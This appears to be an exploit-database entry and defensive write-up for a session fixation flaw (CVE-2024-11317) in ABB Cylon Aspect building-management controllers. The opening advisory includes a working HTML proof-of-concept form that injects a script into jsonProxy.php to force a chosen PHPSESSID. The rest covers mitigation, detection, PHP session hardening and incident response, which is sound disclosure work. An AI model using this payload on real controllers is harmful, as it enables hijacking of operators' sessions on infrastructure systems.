ABB Cylon Aspect 3.08.02 - PHP Session Fixation
# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability
# Advisory ID: ZSL-2025-5916
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php
# CVE ID: CVE-2024-11317
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session
fixation, allowing an attacker to set a predefined PHPSESSID value. An
attacker can leverage an unauthenticated reflected XSS vulnerability in
jsonProxy.php to inject a crafted request, forcing the victim to adopt
a fixated session.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<body>
<!-- Session ID in a cookie (Client-side script) OWASP Ref.: -->
<form action="http://192.168.73.31/jsonProxy.php" method="GET">
<input type="hidden" name="application" value="zeroscience" />
<input type="hidden" name="query" value="<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>" />
<input type="submit" value="Fix!" />
</form>
</body>
</html>ABB Cylon Aspect 3.08.02 — PHP Session Fixation (CVE-2024-11317)
This article explains the PHP session fixation vulnerability affecting ABB Cylon Aspect firmware (versions up to and including 3.08.02), describes the root causes and impact, and provides practical, defense-oriented guidance for detection, mitigation, and secure coding practices. The goal is to help system owners, administrators, and developers remediate risk and harden their environments.
Advisory snapshot
| Field | Details |
|---|---|
| Advisory | ZSL-2025-5916 (ZeroScience) |
| CVE | CVE-2024-11317 |
| Vendor | ABB Ltd. |
| Affected products | NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio (firmware ≤ 3.08.02) |
| Vulnerability type | Session fixation (via reflected XSS in a JSON proxy endpoint) |
What is session fixation?
Session fixation is an attack technique where an adversary forces a victim's web session identifier to a value known to the attacker. If the application accepts the attacker-chosen session identifier and continues to associate it with an authenticated session, the attacker can reuse that identifier to hijack the victim's active session.
How this affected ABB Cylon Aspect (high level)
- An exposed endpoint in the firmware's web interface reflected untrusted input into a response (a reflected XSS vector).
- Using that vector an attacker could cause a victim's browser to adopt a specific PHP session identifier (PHPSESSID).
- If the application did not sufficiently prevent session fixation and accepted the injected session id for an authenticated session, the attacker could reuse the known session id to impersonate the victim.
Impact and risk considerations
Successful exploitation can allow an attacker to access any functionality available in the victim's authenticated session context. On building management systems such as ASPECT, this could include access to telemetry, configuration UI, control operations, or administration features depending on the victim's privileges. Risk is magnified when the web interface is reachable from untrusted networks.
Typical attack scenarios
- Remote attacker lures or tricks an authenticated operator into visiting an attacker-controlled page that forces a preselected session id.
- Attacker reuses the session id to access the controller’s web UI as the victim.
- Data exfiltration, unauthorized changes to control parameters, or pivoting onto internal networks.
Detection and indicators of compromise
- Multiple different user accounts or different source IPs using the same PHPSESSID value in access logs.
- Unusual or predictable-looking session identifiers in logs (see examples below for how to search logs).
- Referrer entries indicating third-party pages triggering requests against JSON or proxy endpoints.
- Anomalous POST/GET requests to jsonProxy-like endpoints with unexpected payloads.
Example commands to search logs (conceptual):
grep -E "PHPSESSID=" /var/log/lighttpd/access.log
awk -F\" '{print $1,$7,$12}' /var/log/httpd/access_log | grep PHPSESSID
Explanation: these examples demonstrate searching HTTP access logs for the presence of PHPSESSID in URLs or cookie fields to find occurrences of session identifiers in requests. Adjust paths and log formats to your environment.
Immediate mitigations and workarounds
- Apply vendor patches or firmware updates from ABB as the primary remediation.
- If a patch is not yet available, restrict network access to management interfaces — place devices behind firewalls, VPNs, or management VLANs.
- Disable or restrict access to any JSON proxy endpoints or other web UI functions that reflect input until patched.
- Deploy WAF rules to block or sanitize requests that attempt to inject scripts or modify session cookies via query parameters.
- Invalidate sessions after suspected exposure: rotate administrative credentials and force a session reset for all users.
Permanent fixes: secure configuration and code-level hardening
The robust long-term remediation combines vendor-supplied updates with secure session management and input handling on the server side. Key measures:
- Always regenerate session identifiers after privilege change or authentication (session fixation mitigation).
- Enable strict session creation semantics so the server ignores client-provided session IDs until a new one is issued server-side.
- Set secure cookie attributes (HttpOnly, Secure, SameSite) to reduce the chance of client-side script access or cross-site misuse.
- Sanitize or validate all reflected output to eliminate reflected XSS vectors.
PHP configuration and code examples (secure practices)
<?php
// Recommended PHP session hardening (run before session_start())
ini_set('session.use_strict_mode', '1'); // refuse uninitialized session IDs
ini_set('session.cookie_httponly', '1'); // prevent JavaScript access to cookie
ini_set('session.cookie_secure', '1'); // send cookie only over HTTPS (ensure HTTPS)
ini_set('session.cookie_samesite', 'Lax'); // or 'Strict' depending on app behavior
// Start a session safely
session_start();
// After successful login or privilege escalation:
session_regenerate_id(true); // generate a new session id and delete the old session data
?>
Explanation: This PHP code configures runtime INI settings that make PHP sessions more hostile to fixation and script access. session.use_strict_mode rejects session IDs not created by the server, preventing attackers from presenting their chosen IDs. session_regenerate_id(true) creates a fresh session ID after authentication (server-side rotation), and the cookie flags limit client-side script access and restrict transmission to secure channels.
Preventing reflected XSS in PHP endpoints
<?php
// Example: safe echo of user-controlled input
$raw = $_GET['query'] ?? '';
// Validate and sanitize: allow only expected content or escape output
$safe = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
// If the endpoint is meant to return JSON, ensure proper content-type and JSON encoding
header('Content-Type: application/json; charset=utf-8');
echo json_encode(['query' => $safe]);
?>
Explanation: This snippet shows basic output escaping using htmlspecialchars and returning data as JSON via json_encode. Proper validation (whitelisting allowed characters or patterns) is preferable to blind escaping. If an endpoint must accept structured parameters, use strict schema validation and avoid reflecting raw input into HTML responses.
Configuring web server to enforce cookie flags
When you cannot control application output quickly, you can add headers at the web server layer to harden cookies. Example approaches:
- For Apache: use Header edit to append HttpOnly and Secure flags to Set-Cookie (ensure traffic is HTTPS first).
- For lighttpd: configure mod_setenv or mod_magnet scripts to post-process Set-Cookie headers or use a fronting reverse proxy to rewrite those headers.
# Example conceptual Apache directive (requires mod_headers)
# Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure;SameSite=Lax
Explanation: This Apache example demonstrates a header rewrite to append security attributes to cookies. Note that adding Secure requires serving over HTTPS. Test carefully to avoid undesired header duplication or breaking application behavior.
Detection tuning and monitoring
- Create SIEM rules that flag repeated use of identical PHPSESSID values from different source IPs or user accounts.
- Alert on requests that include suspicious script markers or unusually long query strings against proxy endpoints.
- Monitor for increases in failed authentication attempts followed by authenticated activity using the same session id.
Incident response checklist
- Isolate affected systems from untrusted networks.
- Collect logs and preserve forensic copies of web access logs and system logs.
- Invalidate all active sessions (force logout) and rotate administrative credentials.
- Apply vendor firmware updates; if unavailable, apply mitigations (network controls, WAF rules) and schedule device replacement or layered mitigations.
- Perform a post-remediation audit to verify that endpoints no longer reflect unsanitized input and session handling has been hardened.
Vendor coordination and patching
Primary remediation is to apply the vendor-supplied firmware update or patch that addresses CVE-2024-11317. Contact ABB support or your supplier for firmware images, release notes, and installation guidance. Keep an inventory of affected devices, maintain a patch schedule, and test updates in a staging environment before production rollout.
Summary — key takeaways
- Session fixation combined with reflected XSS in a management interface is a high-risk condition for devices controlling critical infrastructure.
- Immediate steps: restrict network access, enforce session invalidation and credential rotation, deploy WAF rules, and monitor for IOCs.
- Long-term: apply vendor patches, adopt secure session configuration (use_strict_mode, regenerate session id), add cookie flags, and eliminate reflected XSS through strict input validation/escaping.
References and further reading
- Vendor security advisories and firmware release notes (consult ABB official channels).
- CWE-384 Session Fixation and OWASP Session Management Cheat Sheet for detailed defensive patterns.
- OWASP XSS Prevention Cheat Sheet for concrete guidance on avoiding reflected XSS.